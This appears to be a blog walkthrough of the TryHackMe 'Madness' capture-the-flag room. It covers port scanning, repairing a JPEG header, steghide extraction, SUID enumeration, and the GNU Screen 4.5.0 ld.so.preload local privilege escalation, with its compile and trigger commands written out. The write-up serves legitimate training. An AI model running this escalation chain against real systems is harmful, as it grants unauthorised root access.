Today we will take a look at TryHackMe: Madness. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.
Command: sudo nmap -sS -sC -sV -oN nmap/initial 10.10.152.45
Let’s check the site
As you can see, there is a picture icon above. Let’s click on it.
There are no picture. Let’s download and make some changes.
Command: wget http://10.10.152.45/thm.jpg
The .jpg file is corrupted. Let’s fix it.
List of file signatures - Wikipedia
needs additional citations for verification .improve this article by (Learn how and when to remove this template…
Command: hexeditor thm.jpg
Now let’s try again.
We are provided with a hidden directory.
I was just checking and came across something like this.
There was another hint in the source code.
Open burpsuite and check one by one
And that’s it. We got different results
When we look at the site, we get such a result.
Maybe the image we download needed again. Because this is the steganography code.
Command: steghide info thm.jpg
Command: steghide — extract -sf thm.jpg
Let’s try to crack the hash we got
The Cyber Swiss Army Knife - a web app for encryption, encoding, compression and data analysis
I tried to access the information we have with ssh, but it didn’t work. After a while, I remembered that it was in the form of supplements.
We found the password, let’s enter.
Command: find / -perm -u=s 2>/dev/null
We see something different. Let’s check the exploit.
Offensive Security's Exploit Database Archive
GNU Screen 4.5.0 - Local Privilege Escalation.. local exploit for Linux platform
I created the files in my terminal and transferred them to the target terminal
And I entered the commands.
Command: gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
Command: gcc -o /tmp/rootshell /tmp/rootshell.c
Command: echo “[+] Now we create our /etc/ld.so.preload file…”
Command: cd /etc
Command: umask 000
Command: screen -D -m -L ld.so.preload echo -ne “\x0a/tmp/libhax.so”
Command: echo “[+] Triggering…”
Command: screen -ls
And now we are the root
“If you have any questions or comments, please do not hesitate to write. Have a good days”